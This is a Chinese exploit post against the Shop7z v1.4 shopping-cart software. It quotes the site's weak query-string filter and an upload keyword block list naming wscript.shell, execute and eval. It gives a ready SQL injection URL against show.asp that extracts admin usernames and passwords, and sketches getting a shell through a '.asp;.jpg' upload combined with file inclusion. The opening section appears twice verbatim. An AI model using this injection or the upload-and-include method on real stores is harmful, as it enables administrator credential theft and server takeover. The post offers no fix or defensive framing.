Shop7z网上购物系统 v1.4 漏洞

  • A+
所属分类:漏洞时代
摘要

Author:roker
文件dataname.asp
[php]
path_back=LCase(request.servervariables(“QUERY_STRING”))
if instr(path_back,”insert”)<>0 or instr(path_back,”update”)<>0 or instr(path_back,”delete”)<>0
or instr(path_back,”(“)<>0 or instr(path_back,”‘”)<>0 or instr(path_back,” or “)<>0 or instr(path_back,”replace”)<>0
or instr(path_back,”eval”)<>0 then
response.write ”

你的网址不合法“[/php]
奇葩了。。不知他这么写和没过滤有什么区别。。
于是 看了下数据文件表的结构。。
exp:[php]
show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin[/php]

Author:roker
文件dataname.asp
[php]
path_back=LCase(request.servervariables("QUERY_STRING"))
if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0
or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0
or instr(path_back,"eval")<>0 then
response.write "

你的网址不合法"[/php]
奇葩了。。不知他这么写和没过滤有什么区别。。
于是 看了下数据文件表的结构。。
exp:[php]
show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin[/php]

接下来 getshell
有两个上传的地方
一个是 ewebitor
一个是他自己写的
ewebitor只能上传jpg等正常文件,其他可以利用的都删了
看他自己写的上传。。
可以上传 2013xx.asp;.jpg格式的
可是[php]
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件
sTextAll = lcase(MyText.ReadAll())
MyText.close
set MyFile = nothing
sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"
sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
snum = split(sStr,"|")
for i=0 to ubound(snum)
if instr(sTextAll,snum(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filename)
set filedel = nothing
Response.Write("

")
Response.End()
end if
next[/php]
各种过滤有木有啊
可是他忘记了文件包含!
所以 两个上传 结合在一起 就可以getshell啦~~~

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: